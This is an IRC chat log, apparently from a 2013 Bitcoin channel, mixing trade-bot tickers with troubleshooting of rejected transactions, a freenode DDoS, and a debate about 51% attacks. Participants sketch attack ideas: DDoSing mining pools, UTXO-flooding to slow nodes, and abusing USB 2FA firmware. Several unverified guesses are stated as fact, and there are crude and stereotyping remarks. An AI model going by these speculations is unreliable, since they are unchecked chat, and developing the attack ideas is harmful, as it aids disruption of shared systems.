0.106 = 0.53 BTC [+] May 14 00:19:03 ha, freenode is gasping for breath, yet here I sit, in 15 channels, just lurking. May 14 00:19:19 till the blockchain makes us part May 14 00:20:12 nevar! May 14 00:24:17 ;;ticker May 14 00:24:28 Error: Failure to retrieve ticker. Try again later. May 14 00:25:35 [BTCTC] [BASIC-MINING] 10 @ 0.411003 = 4.11 BTC [-] May 14 00:25:43 -mrmist- [Global Notice] Sadly the DDoS attacks are still ongoing and that it is affecting major parts of our infrastructure resulting in timeouts and loss of some service (at least, but not limited to webchat, support ticket system and hidden tor service). A special thank you to our sponsors, whom we love so much. ♥ May 14 00:26:10 im curious if this actually blows freenode off the interwebs. May 14 00:26:57 [MPEX] [S.MPOE] 6676 @ 0.00068408 = 4.5669 BTC [-] May 14 00:27:54 [BTCTC] [ASICMINER-PT] 2 @ 1.51999 = 3.04 BTC [+] May 14 00:28:16 no way May 14 00:28:20 it will come back stronger May 14 00:28:42 whoa it's incredible, the bitfury bet still at 10:1 May 14 00:28:46 peepz out of money ? May 14 00:30:58 who is this guy? you think he has any chance? May 14 00:31:40 well here's the score : if he is in fact delivering 200th up to 22peta hash, May 14 00:31:42 then asicminer is dead. May 14 00:31:57 [HAVELOCK] [ASICM] 8 @ 0.01491899 = 0.1194 BTC [+] May 14 00:31:59 if you have a bitcoin in asicminer it makes sense to bet as much as .1 btc against him, seeing the odds. May 14 00:32:13 therefore, we can calculate the % of idiots in asicminer as follows : May 14 00:32:32 total no side bet divided by asicminer market cap May 14 00:32:40 ;;calc 13 / 600000 May 14 00:32:40 2.16666666667e-05 May 14 00:32:51 that's what, 998 people out of 1000 ? May 14 00:33:27 just some off the cuff degree-of-magnitude accurate maffs. May 14 00:33:32 deadweasel: it will likely kick out the channel which is causing the ddos drama May 14 00:33:47 its not #bitcoin-trollbox May 14 00:33:52 thats a picture of health May 14 00:33:55 lol May 14 00:34:08 dub: yea, i kinda suspect it'll be #bitcoin* :) May 14 00:34:13 ezdiy: which channel is that? May 14 00:34:14 [BTCTC] [ASICMINER-PT] 8 @ 1.51999 = 12.1599 BTC [+] May 14 00:34:20 deadweasel: well May 14 00:34:26 bitcoin is second largest community after ubuntu May 14 00:34:28 so guess what May 14 00:34:46 aaw man. May 14 00:34:53 now I feel bad. May 14 00:34:53 (out of my arse speculation) May 14 00:34:56 mp/jurov, could you push withdrawals May 14 00:35:02 got hustlin' to do May 14 00:35:16 ThickAsThieves k, be like half hour. May 14 00:35:23 poop, ok May 14 00:36:33 i guess we find out, ezdiy. May 14 00:36:59 (subtly luring me to start bitbet.us bet lol :) May 14 00:37:00 tho tbh kicking out bitcoin would be pretty damaging to them. May 14 00:37:09 do it! May 14 00:37:19 lol why do i need to lure you, i can just make one May 14 00:37:20 i got .5 on FREENODE LIVES May 14 00:37:24 So the full terms of the bitfury bet are - they deliver how much? in basically a month? May 14 00:37:41 mircea_popescu: not enough info for that yet :/ May 14 00:37:47 jborkl just demonstrate hashing May 14 00:37:58 might be just some kiddo nerdraging at mircop May 14 00:38:13 or a guy with serious firepower systematically trying to target something May 14 00:38:22 what's mircop May 14 00:38:28 mircop? May 14 00:38:28 irc operator May 14 00:38:30 using mIRC May 14 00:38:31 lol May 14 00:38:34 LOL May 14 00:38:55 [MPEX] [S.MPOE] 1874 @ 0.00068676 = 1.287 BTC [+] May 14 00:39:09 lolk May 14 00:39:13 im sure that would pass bash moderation May 14 00:39:55 is bitfury russian? May 14 00:40:26 [BTCTC] [ASICMINER-PT] 25 @ 1.51999 = 37.9998 BTC [+] May 14 00:41:14 yteah May 14 00:41:16 seems so. May 14 00:41:32 would be funnay if the russians blow out the chinese. May 14 00:41:44 historically accurate too May 14 00:41:57 [HAVELOCK] [ASICM] 13 @ 0.01491899 = 0.1939 BTC [+] May 14 00:42:32 bitfury exists? May 14 00:42:47 no higher education... gonna make the chips himself? May 14 00:42:50 [BTCTC] [ASICMINER-PT] 1 @ 1.531992 BTC [+] May 14 00:42:54 https://bitcointalk.org/index.php?topic=203107.0 May 14 00:44:05 dub well somebody got 100 btc. May 14 00:44:28 honestly i was expecting to see that bet like 5:1 not 1:10 May 14 00:45:05 [BTCTC] [TAT.ASICMINER] 30 @ 0.01512 = 0.4536 BTC [+] May 14 00:47:40 ;;google bitfury May 14 00:47:40 BitFury: Home: ; BitFury 110 Gh/s :: BitFury: ; XC6SLX150 BitStream :: BitFury: May 14 00:48:30 fwiw higher education just means you learned to suck dick May 14 00:48:33 damn easy europeans May 14 00:48:41 they need to drop those things in vegetable oil for cooling. May 14 00:48:54 and their provess at both scamming and technology design lol May 14 00:48:55 cooking ? May 14 00:49:03 well, ya learn a lot of things, mostly conditioning May 14 00:49:20 not much in a practical sense May 14 00:49:43 no, not practical, then again I didn't study all that hard either. May 14 00:50:18 mineral oil makes sense if you have a lot of components with thermal surface May 14 00:50:24 [BTCTC] [ASICMINER-PT] 1 @ 1.54876 BTC [+] May 14 00:50:24 inb4 avalon aquarium May 14 00:50:59 you could just pump the oil around a little faster May 14 00:51:23 i mean, its not worth the hassle May 14 00:51:45 to have a leak proof tank, pumps, heat exchangers etc, if you can just use fans May 14 00:52:41 well shit May 14 00:53:17 when my bitfury asic gets here, I'm putting a fan on it 0.o May 14 00:53:52 lol May 14 00:53:53 [MPEX] [S.MPOE] 16226 @ 0.00068446 = 11.106 BTC [-] May 14 00:53:54 [MPEX] [S.MPOE] 1163 @ 0.00068706 = 0.7991 BTC [+] May 14 00:54:13 deadweasel: just order the whole 100gh/s fpga rack May 14 00:54:31 submerge it in oil and heat exchange with water in nearby river May 14 00:54:39 you save 3kw on air cooling \o/ May 14 00:56:13 [BTCTC] [ASICMINER-PT] 1 @ 1.5204 BTC [-] May 14 00:56:26 [BTCTC] [ASICMINER-PT] 1 @ 1.520324 BTC [-] May 14 00:57:10 ezdiy, wish I could. do you mine? May 14 00:57:43 nah, i was just kinda lampooning their current fpga offering as it is largely outdated atm :) May 14 00:58:31 i think ezdiy mostly trolls May 14 00:59:18 i think mp is mostly pedantic nazi May 14 00:59:27 [MPEX] [S.MPOE] 1950 @ 0.00068706 = 1.3398 BTC [+] May 14 01:00:22 totally. May 14 01:04:39 sorry about the delay ThickAsThieves. i've recently beefed up the security and i think i might have gone too far ;/ May 14 01:04:48 will be processing asap tho. May 14 01:05:10 I think ezdiy has a calssic case of 'I'm chatting on the internet therefor I know everything' May 14 01:05:25 and also a classic case May 14 01:05:57 [HAVELOCK] [ASICM] 30 @ 0.01491899 = 0.4476 BTC [+] May 14 01:06:24 if it was trolling, he'd need to be in #bitcoin-trollbox May 14 01:06:38 mtgox down again May 14 01:07:48 dub: well, you _dont_ know? May 14 01:08:07 it's clearly established wisdom of bitcoin community that not knowing implies ignorance May 14 01:08:13 [BTCTC] [ASICMINER-PT] 1 @ 1.548389 BTC [+] May 14 01:10:48 [BTCTC] [ASICMINER-PT] 1 @ 1.5484 BTC [+] May 14 01:12:50 [BTCTC] [ASICMINER-PT] 1 @ 1.549978 BTC [+] May 14 01:13:03 [BTCTC] [ASICMINER-PT] 1 @ 1.549978 BTC [+] May 14 01:15:16 hey I'm just here to spam #bitcoin-trollbox May 14 01:15:17 [MPEX] [S.DICE] 1100 @ 0.00300015 = 3.3002 BTC [+] May 14 01:18:18 figured as much :) May 14 01:18:39 and maybe learn a thing or two about finance in the process May 14 01:19:27 mircea_popescu i hope you don't beef up the security so far as reptilia May 14 01:19:29 "I have pretty many coins and I store them with pretty many precautions. By many, I mean that it takes me an approximately 16 hours of my prime work time to do it, and it also does not happen without a considerable monetary cost." May 14 01:19:43 not quite. May 14 01:19:45 im not as pretty. May 14 01:19:57 [HAVELOCK] [ASICM] 12 @ 0.01491899 = 0.179 BTC [+] May 14 01:19:58 [HAVELOCK] [ASICM] 21 @ 0.01492 = 0.3133 BTC [+] May 14 01:20:57 [HAVELOCK] [ASICM] 12 @ 0.01492 = 0.179 BTC [+] May 14 01:21:45 hmm, all my nodes paused and are acting strage May 14 01:21:53 strange May 14 01:21:58 [HAVELOCK] [ASICM] 57 @ 0.014925 = 0.8507 BTC [+] May 14 01:21:59 jborkl: ec2 nodes? May 14 01:22:17 all my class 1.2 supernodes May 14 01:22:19 lol May 14 01:22:42 you must check the sauna May 14 01:23:00 jborkl there's something afoot on the blockchain. May 14 01:23:49 but the fork is planned on tomorrow, no? May 14 01:23:57 [HAVELOCK] [ASICM] 70 @ 0.014925 = 1.0448 BTC [+] May 14 01:24:00 they are still relaying, but appear to have stopped May 14 01:24:22 jurov there's an issue. May 14 01:24:29 i have no idea wtf yet. May 14 01:25:09 hm.. my bitcoinds seem to work normally May 14 01:25:20 yes, for sure - my nodes are not working correct as of the last block - the time stamp in bitcoind has stopped also May 14 01:25:57 [HAVELOCK] [ASICM] 12 @ 0.01492 = 0.179 BTC [-] May 14 01:25:58 [HAVELOCK] [ASICM] 12 @ 0.01491899 = 0.179 BTC [-] May 14 01:27:18 [BTCTC] [BITVPS] 12 @ 0.0009 = 0.0108 BTC [+] May 14 01:28:01 i think we're forking May 14 01:28:08 new bug ?! May 14 01:28:20 restarted and now the time stamp is progressing May 14 01:28:39 where it does show timestamp? May 14 01:29:04 jurov stat :D May 14 01:29:31 http://blockchain.info/rejected shows lots of new stuff May 14 01:30:39 [MPEX] [S.MPOE] 2557 @ 0.00068733 = 1.7575 BTC [+] May 14 01:30:39 [MPEX] [S.MPOE] 13343 @ 0.00068706 = 9.1674 BTC [-] May 14 01:31:35 don't shit me, bitcoind getinfo is not outputting any timestamp May 14 01:34:50 pls can anyone explain me what's happening. in full sentences... May 14 01:38:12 I am trying to figure it out, have to go home though May 14 01:38:59 ERROR: CScriptCheck() : bbf6540a80bf356ab33c7ebf15317a246ed3a46bfe0df30bba3052935d711b9b VerifySignature failed May 14 01:39:02 ERROR: CTxMemPool::accept() : ConnectInputs failed bbf6540a80bf356ab33c7ebf15317a246ed3a46bfe0df30bba3052935d711b9b May 14 01:39:05 hm May 14 01:39:07 this can't be good May 14 01:39:26 this has to be a fork May 14 01:39:36 it's screwed wtf. May 14 01:39:40 my bitcoind claims the sig is invalid May 14 01:39:47 but blockchain info says its ok May 14 01:39:50 but unconfirmed May 14 01:39:57 (im running latest git) May 14 01:40:16 ok everyone do not make any further txns until we figure out what the fuck is going on May 14 01:40:26 has anyone notified the power rangers yet ? May 14 01:41:28 -dev is silent May 14 01:41:51 fuck if you and I notcied right away wtf are they doing May 14 01:41:54 can someone ./bitcoind gettransaction bbf6540a80bf356ab33c7ebf15317a246ed3a46bfe0df30bba3052935d711b9b May 14 01:41:59 if you have it May 14 01:42:01 then we're screwed May 14 01:42:06 jborkl originally i thought i'm fucking it up tbh May 14 01:42:09 as i'm on the other side of fork May 14 01:42:31 error: {"code":-5,"message":"Invalid or non-wallet transaction id"} May 14 01:42:38 hm, ok May 14 01:42:46 eek May 14 01:42:48 well mp , obvious but pause my withdrawal until later May 14 01:42:55 jurov: did it get rejected in your debug.log as well? May 14 01:43:29 ezdiy i have it on exactly one node May 14 01:43:30 blockchain.info shows it as unconfirmed May 14 01:43:33 8 btc May 14 01:43:51 mircea_popescu: yeah, but your node should have rejected it :/ May 14 01:43:58 transactions are still going through all of my nodes May 14 01:44:02 dude i have no idea. May 14 01:44:06 with ConnectInputs failed May 14 01:44:16 mircea_popescu: grep ~/.bitcoin/debug.log for it May 14 01:44:25 i don't have ssh for that machine right now May 14 01:44:32 dang May 14 01:44:43 well, lets wait for a bit May 14 01:44:54 it only says received getdata for: tx bbf6540a80 May 14 01:44:54 maybe its just orphaned tx input or something May 14 01:44:57 nothing else May 14 01:44:59 storing orphans like a bitch though May 14 01:45:05 all it is doing May 14 01:45:08 this is pretty insane May 14 01:45:23 it would seem over about a dozen nodes there's something like... 8 diff chains/orphans ? May 14 01:45:35 yep :/ May 14 01:45:46 wtf we imploded what happened here May 14 01:50:51 ezdiy: bbf6540a80bf356ab33c7ebf15317a246ed3a46bfe0df30bba3052935d711b9b non-existant here May 14 01:51:15 [BTCTC] [COGNITIVE] 1 @ 0.2 BTC [+] May 14 01:51:39 seems like it May 14 01:52:05 mircea_popescu: we need getrawtransaction of that guy, if possible May 14 01:52:41 CTxMemPool::accept() : accepted bbf6540a80 (poolsz 2531) May 14 01:52:41 received getdata for: tx bbf6540a80 May 14 01:53:15 so it seems to be accepted on my node May 14 01:53:26 getrawtransaction returns it May 14 01:53:39 [BTCTC] [ASICMINER-PT] 1 @ 1.54988 BTC [-] May 14 01:53:41 but of course gettransaction doesn't because it isn't from my wallet May 14 01:53:44 TheSeven: paste May 14 01:53:52 $ bitcoind getrawtransaction bbf6540a80bf356ab33c7ebf15317a246ed3a46bfe0df30bba3052935d711b9b May 14 01:53:52 0100000001eb8b5d0d5dd4b4dd61d9737d82f63d24c34aa55587d0e4a7605aa230120e91fb000000008a4730440220c309d71f3b8cbafce79d7ab2afde11c16d8f566f2d1e375b305df621ec0d9f230220c073cfa2018bee371bd4f771730368d66762628093f5d1922123c7938681fd0d014104b7b6fcff33b2233c8ca607390f951e845865088a26264a291ffcea2d67bcccfc0dee3e2f906f6feeedea3d2fcf563f5d5c1a7e76a621b8fb659ad9865f2eefeeffffffff010008af2f000000001976a9147b6746f308567c7d5e7ac79bb79412339952514888ac0 May 14 01:53:52 0000000 May 14 01:54:11 this is a 0.8.1 node May 14 01:55:24 ok, moving this over to #bitcoin-dev May 14 01:59:29 [MPEX] [S.MPOE] 7900 @ 0.00068274 = 5.3936 BTC [-] May 14 02:02:52 -dev says it is this: https://bitcointalk.org/index.php?topic=106461.5 May 14 02:05:03 the hour-or-so gap points to FUD campaign imo May 14 02:05:33 hum May 14 02:05:57 i thought that was fixed months ago May 14 02:06:05 though hourly block gaps happen for innocent reasons too May 14 02:06:09 maybe i misunderstood something May 14 02:06:35 all pools unlucky -> lots of rejected txes because of DER sig rules -> FUD May 14 02:06:49 you can s/all pools unlucky/all pools dosed somehow/ May 14 02:07:08 ezdiy was your tx ber'd ? May 14 02:07:24 yep, all the broken txes seem to have nonstandard sigs under 0.8.2 May 14 02:07:44 did you send it from armory actually ? May 14 02:08:34 no idea, i'm just looking at debug.log May 14 02:08:52 there was apparently some split brain scenario during the time there were no new blocks mined May 14 02:08:59 my dept of technology & paranoia is not happy with the sig explanation. May 14 02:08:59 as you can send tx on of another one in mempool May 14 02:09:09 *on top May 14 02:09:19 not much so when half of network rejects it in mempool though May 14 02:09:57 [HAVELOCK] [SDICE] 1 @ 0.269 BTC [+] May 14 02:11:21 ;;difchange May 14 02:11:22 Error: "difchange" is not a valid command. May 14 02:11:28 ;;diffchange May 14 02:11:30 Estimated percent change in difficulty this period | 18.95114 % based on data since last change | 17.0779 % based on data for last three days May 14 02:11:48 ;;estimate May 14 02:11:50 Next difficulty estimate | 13307370.2306 based on data since last change | 13097805.7081 based on data for last three days May 14 02:12:06 ;;tslb May 14 02:12:10 Time since last block: 3 minutes and 53 seconds May 14 02:12:13 ;;nethash May 14 02:12:14 93759.1759279 May 14 02:12:19 shit oh dear May 14 02:12:22 um May 14 02:12:34 mircea_popescu: yeah, there was a hour-or-so gap May 14 02:12:41 which block is gribble on May 14 02:12:44 That Escalated Quickly May 14 02:12:47 ;;block May 14 02:12:47 Error: "block" is not a valid command. May 14 02:12:55 ;;blockhieght May 14 02:12:55 Error: "blockhieght" is not a valid command. May 14 02:13:03 ;;blocks May 14 02:13:04 236070 May 14 02:13:15 ya but which May 14 02:13:33 0000000000000133f6f3a4750a atop 0000000000000045aeb20b5d64 ? May 14 02:14:57 yes blockhain.info shows these two most recent May 14 02:16:23 i guess no fork just some funky reorg then ? May 14 02:17:48 no reorg May 14 02:17:57 [HAVELOCK] [ASICM] 37 @ 0.014925 = 0.5522 BTC [+] May 14 02:18:06 look at blockchain info, there was *over a hour* gap between blocks May 14 02:18:17 pools simply were unlucky/dosed May 14 02:18:23 hm May 14 02:18:25 and people who use 0.8.2 from git see the tx rejected May 14 02:18:30 no cauyse there were orphaned block in between May 14 02:19:01 jurov: until its accepted in the block by 0.8.1 miner May 14 02:19:07 then even 0.8.2 accepts it May 14 02:19:10 or at least it should May 14 02:19:23 ezdiy yes, it got accepted now May 14 02:19:32 but no orphaned blocks afaik May 14 02:20:24 [BTCTC] [TAT.ASICMINER] 42 @ 0.01512 = 0.635 BTC [+] May 14 02:21:42 i'm confused. May 14 02:22:17 you're btc-e kiddo and can ddos pools May 14 02:22:23 0.8.2 implements weird rule May 14 02:22:36 whatya do to create price wave to ride it? :) May 14 02:22:42 [BTCTC] [ASICMINER-PT] 2 @ 1.549 = 3.098 BTC [-] May 14 02:23:32 hm May 14 02:23:43 any pool actually say they're ddosed yet ? May 14 02:23:45 (i highly doubt its was just an innocent coincidence, as the chances are <1% of block gap occuring so conveniently) May 14 02:23:46 not heard anything. May 14 02:24:03 yeah, that'd confirm my speculation May 14 02:24:10 guild's website was down yesterday May 14 02:24:16 short ddoses go unnoticed often though May 14 02:25:12 1hr is not short. May 14 02:25:15 for a pool. May 14 02:25:34 most miners have it setup to switch pools when one is down May 14 02:25:56 of course it's false sense of security, just ddos all the pools commonly used lol May 14 02:27:10 (btw, p2pool is suspected to have high stale rate because you can tie individual miners/hashpower to certain ips) May 14 02:27:26 in that sense, pools are useful they shield individual miners from direct attacks May 14 02:27:55 tjhat just shows how dysfunctional the entire p2p model is. May 14 02:28:23 well, better said naive implementation of p2p May 14 02:29:24 right. May 14 02:29:47 in other words cheap. May 14 02:30:33 ;;tslb May 14 02:30:37 Time since last block: 11 minutes and 35 seconds May 14 02:31:10 ;;blocks May 14 02:31:11 236072 May 14 02:31:20 i see two chains. May 14 02:31:28 one's on 236071 16 mins ago May 14 02:31:32 the other no wait May 14 02:31:48 ok there's some connectivity weirdness May 14 02:32:56 [HAVELOCK] [ASICM] 1 @ 0.014925 BTC [+] May 14 02:34:56 [HAVELOCK] [ASICM] 35 @ 0.014925 = 0.5224 BTC [+] May 14 02:37:25 ;;blockas May 14 02:37:25 Error: "blockas" is not a valid command. May 14 02:37:26 ;;blocks May 14 02:37:27 236074 May 14 02:37:32 so slush just mined an empty block ? May 14 02:38:06 and it came in within 30 seconds of 236073 ? May 14 02:44:17 [BTCTC] [ASICMINER-PT] 2 @ 1.549 = 3.098 BTC [-] May 14 02:46:56 http://blockchain.info/block-index/382582/00000000000000456bcd68f888f1af4d9c5ecf807fd23f328acd9410c1d0fa81 <-- slush bitcoind under attack May 14 02:47:56 [HAVELOCK] [HIM] 1 @ 2.1 BTC [-] May 14 02:50:13 how do you figure ? May 14 02:50:31 block with no transactions May 14 02:50:38 but slush is signed in coinbase if you click at txid May 14 02:50:56 means his bitcoind must have been somehow convinced there were no txes *at all* May 14 02:51:44 [BTCTC] [ASICMINER-PT] 2 @ 1.549978 = 3.1 BTC [+] May 14 02:51:52 [BTCTC] [ASICMINER-PT] 4 @ 1.549978 = 6.1999 BTC [+] May 14 02:51:57 [BTCTC] [ASICMINER-PT] 1 @ 1.549979 BTC [+] May 14 02:52:11 [BTCTC] [ASICMINER-PT] 1 @ 1.549979 BTC [+] May 14 02:52:16 [BTCTC] [ASICMINER-PT] 2 @ 1.549979 = 3.1 BTC [+] May 14 02:52:35 or maybe just broken code, who knows May 14 02:52:41 the downside of central models :) May 14 02:54:11 [BTCTC] [ASICMINER-PT] 1 @ 1.549979 BTC [+] May 14 02:54:24 [BTCTC] [ASICMINER-PT] 4 @ 1.549979 = 6.1999 BTC [+] May 14 02:56:00 ezdiy: when a new block is found the pool code pushes work out with no txs. it does this while it builds the new merkle root. that way the miners have work immediately May 14 02:56:18 and on the off chance someone solves it everyone is rewarded May 14 02:57:28 optimator: not most optimal solution then, though :/ May 14 02:57:53 i'm surprised theres no bloody murder scream from users about 1-tx blocks May 14 02:59:33 we'll it's beyond a long shot - within seconds new work is pushed with transactions. Otherwise the miners would be working on work for a block that had already been solved May 14 02:59:41 yeah May 14 02:59:48 s/we'll/well May 14 02:59:48 but the underlying idea is only greed May 14 02:59:57 it profits only the miners, not users May 14 03:00:06 s/profits/benefits/ May 14 03:00:53 i see it as rewarding them for their work on the network May 14 03:01:55 optimator: no, the merkle root should be updated continuously by slush May 14 03:02:01 not when new block arrives May 14 03:02:09 thats just being lazy, to the detriment of users May 14 03:02:22 this is why hasprevblock is separate after all May 14 03:02:50 it doesn't work that way. The block height is incorporated into the hash function. So you can know what to push unless you know the block you are working on May 14 03:03:40 you, you have to re-verify txes which use same utxos as the txes in newly arrived block May 14 03:03:41 imagine a queue that you are pushing new txs on. You keep building it up, but when a new block is found the queueu is emptied May 14 03:03:47 but you *dont* have to to verify sigs again May 14 03:03:52 => its crazy fast May 14 03:03:55 i call lazy May 14 03:04:40 optimator: yes, thats how it works and why slush pushes empty merkle for the mean time May 14 03:04:46 until he re-verifies everything May 14 03:05:24 optimator: this is probably something to be fixed in bitcoind, though :( May 14 03:05:43 so people dont invent crazy hacks to prevent stales May 14 03:05:55 [MPEX] [S.MPOE] 2250 @ 0.00068274 = 1.5362 BTC [-] May 14 03:05:57 [MPEX] [S.MPOE] 8600 @ 0.00068122 = 5.8585 BTC [-] May 14 03:06:51 ezdiy: yes, in bitcoind. It's can be 300 ms to get the new tx list May 14 03:07:34 or much more if youre clever to push lots of utxos which will seek all through 6gb May 14 03:07:45 imagine 1000 utxos, each spaced at 4mb boundary May 14 03:08:11 spinning drives will go crazy :/ May 14 03:08:17 not to mention slow ecdsa verify May 14 03:10:18 optimator: the trick is, when new block arrives, you just remove txes which are in it from your mempool (no verify needed, no seeks needed) and recompute merkle May 14 03:10:40 [BTCTC] [ASICMINER-PT] 1 @ 1.54898 BTC [-] May 14 03:12:50 ezdiy: yeah, maybe. I think you are coming at it from the bitcoind level and I'm coming at it from the json-rpc level May 14 03:13:11 well, i see why its done like its done May 14 03:13:18 because simple flush-and-redo is much simpler to implement May 14 03:13:30 carefully pruning the outdated utxos must be written from scratch :( May 14 03:14:03 plus you'd have to get the new block because you don't know what txs were included in it May 14 03:14:12 well, its like May 14 03:14:36 you get new block, and look at inputs of all transactions in there May 14 03:15:15 and just 1:1 compare with your mempool, if possible - the general case is lots of those will be same May 14 03:15:41 the rest must be verified of course May 14 03:15:44 [BTCTC] [TAT.ASICMINER] 50 @ 0.01512 = 0.756 BTC [+] May 14 03:16:02 sure - 300 ms to getblock, compare, and recalc May 14 03:16:06 but the ones you found in your mempool are already verified, because you do that whenever they arrive in your mempool May 14 03:16:28 optimator: i think some json api for pools would be in order May 14 03:17:15 um, nah May 14 03:17:24 getblock is enough, just make it faster/longpoll May 14 03:19:57 her mircea do you have a link on hand to your piece commenting on monetary sterilization" May 14 03:20:00 ? May 14 03:20:23 benkay which one is that ? May 14 03:22:20 found it May 14 03:22:27 ms warren 'stepping on it' May 14 03:22:51 lolk May 14 03:22:57 http://www.greendiary.com/wp-content/uploads/2012/07/gribble_Otoeh_11446.jpg May 14 03:23:20 [BTCTC] [TAT.ASICMINER] 8 @ 0.0151 = 0.1208 BTC [-] May 14 03:26:11 [BTCTC] [TAT.ASICMINER] 16 @ 0.01512 = 0.2419 BTC [+] May 14 03:26:19 [BTCTC] [ASICMINER-PT] 1 @ 1.54898 BTC [-] May 14 03:35:37 i'm mobile but did mpex withdrawals not go out yet? May 14 03:35:51 wallet says no May 14 03:36:00 :( May 14 03:41:11 ThickAsThieves read up the history, we've had some excitement. May 14 03:41:23 anyway, i'm putting it off to string of extremely unlikely coincidences. May 14 03:44:00 [HAVELOCK] [ASICM] 3 @ 0.014925 = 0.0448 BTC [+] May 14 03:53:19 Don_Popescu May 14 03:53:48 hm ? May 14 03:54:08 lol good name for you May 14 03:54:09 ;;tslb May 14 03:54:14 Time since last block: 8 minutes and 17 seconds May 14 04:02:47 ;;nethash May 14 04:02:48 93934.6414104 May 14 04:03:00 ;;bc,stats May 14 04:03:04 Current Blocks: 236085 | Current Difficulty: 1.1187257461360792E7 | Next Difficulty At Block: 237887 | Next Difficulty In: 1802 blocks | Next Difficulty In About: 1 week, 3 days, 7 hours, 7 minutes, and 53 seconds | Next Difficulty Estimate: 13424353.8156 | Estimated Percent Change: 19.99683 May 14 04:03:38 so i skimmed, but essentially we have a weird empty block, likely malicious intent, and possible fork? May 14 04:03:53 Mr. Popescu. May 14 04:04:13 [BTCTC] [TAT.ASICMINER] 59 @ 0.01512 = 0.8921 BTC [+] May 14 04:07:56 [HAVELOCK] [ASICM] 50 @ 0.014925 = 0.7463 BTC [+] May 14 04:09:24 ThickAsThieves nah there was a 1hr+ pause just as the new bitcoind changed signature rules making it look like a multifork May 14 04:09:33 on top of some internal stuff May 14 04:10:16 hrm May 14 04:10:17 [BTCTC] [COGNITIVE] 2 @ 0.2 = 0.4 BTC [+] May 14 04:10:24 can i still be mad at devs? May 14 04:10:55 im not sure they did anything wrong. May 14 04:11:00 the sigrule kinda had to be tightened. May 14 04:11:19 aww even mp tells me to drop the pitchfork May 14 04:11:33 will do May 14 04:11:48 i mean it looked fucking weird as all hell for a coupla hours there, but... May 14 04:11:50 funk. it occurs. May 14 04:18:31 if anybody's been wondering what a 51%/doublespend trigger pull will look like: it will look exactly like this. May 14 04:18:38 a whimper, not a bang. May 14 04:19:00 doesn't change the fact of the newly-perforated meat, though May 14 04:19:33 hmm May 14 04:19:42 so if i look up my wallet on blockchain May 14 04:19:53 it shows 1 tx i was expecting May 14 04:19:58 but not the other May 14 04:20:07 if look from within my wallet May 14 04:20:12 i see the other May 14 04:20:16 but not the 1st one May 14 04:20:26 this is via blockchain.info May 14 04:21:55 [HAVELOCK] [ASICM] 247 @ 0.014925 = 3.6865 BTC [+] May 14 04:22:51 [MPEX] [S.DICE] 553 @ 0.00295421 = 1.6337 BTC [-] May 14 04:22:52 okay i closed and reopened and all is well now May 14 04:22:56 [HAVELOCK] [SDICE] 1 @ 0.2898 BTC [+] May 14 04:23:46 asciilifeform probably. May 14 04:24:17 ThickAsThieves pretty much everyone is having trouble with the 8.2 duality. May 14 04:24:24 and don't make the mistake of thinking that all is well just because the universe looks as expected through your particular peephole. May 14 04:24:52 asciilifeform the world is made of probabilities not certainties. May 14 04:25:16 mircea_popescu: Captain (Admiral?) obvious May 14 04:25:20 lol May 14 04:26:27 the probability of the "doublespend ring of sauron" falling into human hands is close to 1. May 14 04:26:56 i don't think so. May 14 04:27:08 i think actual 51% past this point is an impossibility May 14 04:27:32 mircea_popescu: look at you stabilizing dat pric May 14 04:28:23 asciilifeform the reasoning is that basically bitcoin is a sort of morphism on the fiat world, and i am pretty convinced by now that the 51% attack is the local equivalent of the market cornering problem. May 14 04:30:36 51% is difficult, yes, but quite possible to do. and to do undetectably. May 14 04:30:51 I described several "easy" recipes as to how, at one point. May 14 04:31:53 at this point, the objective wouldn't necessarily be a straightforward monetary one, but to drive people to questionable altchains May 14 04:32:49 all you really need to push (at least some of) the lemmings over the edge is to induce enough protocol weirdness May 14 04:33:06 it's not possible to do. May 14 04:33:11 you might not even need a strict 51% for that May 14 04:33:16 it apperars possible to do, but only in static representations of reality May 14 04:33:29 much like cornering markets appears possible to do in static representations of reality. May 14 04:34:07 ;;ticker May 14 04:34:08 BTCUSD ticker | Best bid: 117.53004, Best ask: 117.94999, Bid-ask spread: 0.41995, Last trade: 117.53002, 24 hour volume: 26422.96173181, 24 hour low: 114.50020, 24 hour high: 118.88000, 24 hour vwap: 117.07249 May 14 04:34:20 this is like saying that a bullet hole is no big problem so long as the wound mostly closes back up after the bullet exits. May 14 04:34:23 zero impact, for that matter. the lemmings aren't in this channel. they will never know today happened May 14 04:34:42 for that matter, they don't trust themselves enough to believe their eyes. if respected people don't say there's a problem, there's no problem. May 14 04:34:43 etc. May 14 04:35:00 im not sure i follow that bullet analogy May 14 04:35:21 the idea is that temporary disruptions can have permanent effect May 14 04:35:43 well if it's a stochastic process, prolly. May 14 04:36:02 see 'goxlag' etc May 14 04:36:27 i still need to see someone argue convincingly that goxlag is bad for bitcoin. May 14 04:36:36 it's horible for gox, and esopecxially so for gox investors. so ? May 14 04:36:47 not even considering that, if what we just saw was the echo of an actual double spend, it is entirely possible that somebody just sucked out N BTC out of the aether May 14 04:37:03 there is only so many times that this can happen without a real effect May 14 04:37:19 https://bitcointalk.org/index.php?topic=203837.20 May 14 04:37:21 lik that ? May 14 04:37:55 [HAVELOCK] [ASICM] 235 @ 0.014925 = 3.5074 BTC [+] May 14 04:38:42 the link appears to talk about a traditional wallet heist May 14 04:39:13 through 2fa ? May 14 04:39:41 AFAIK mtgox uses usb widgets for 2fa May 14 04:40:04 yup May 14 04:40:06 perhaps our friend left his plugged in, and it can be actuated through software in some undocumented way (rather than pressing the switch) May 14 04:40:31 or, likely, it has a firmware upgrade endpoint (most usb devices do, whether documented or not.) May 14 04:40:45 a USB thumb drive from virtually any manufacturer, for instance, does May 14 04:40:47 right, what io'm sauying is, this is a working prototype May 14 04:40:57 n btc sucked into the aether May 14 04:41:17 not into or from the aether, but into a more clever man's pocket, from a chump's. May 14 04:41:28 BTC was conserved. May 14 04:41:39 well a 51% attack wouldn't generate btc. May 14 04:41:52 true, it will generate a Bezzle. May 14 04:41:55 [HAVELOCK] [HIM] 1 @ 2.15 BTC [+] May 14 04:41:59 [BTCTC] [ASICMINER-PT] 1 @ 1.522746 BTC [-] May 14 04:42:13 [BTCTC] [S.MPOE-PT] 1400 @ 0.000666 = 0.9324 BTC [-] May 14 04:42:31 AFAIK, how quickly the bezzle dissolves will depend on how long the attack can be maintained. May 14 04:42:35 nope. it'll do exactly the same thing as mtgox lieing about "hacks" May 14 04:42:59 yes, if your fractional reserve hypothesis is correct May 14 04:43:25 listen. suppose you actually have the tech to own yubikeys May 14 04:43:25 (that is, the total of all people storing N btc on gox do not actually have access to N btc) May 14 04:43:33 and let's presume for a moment you have no better use for it 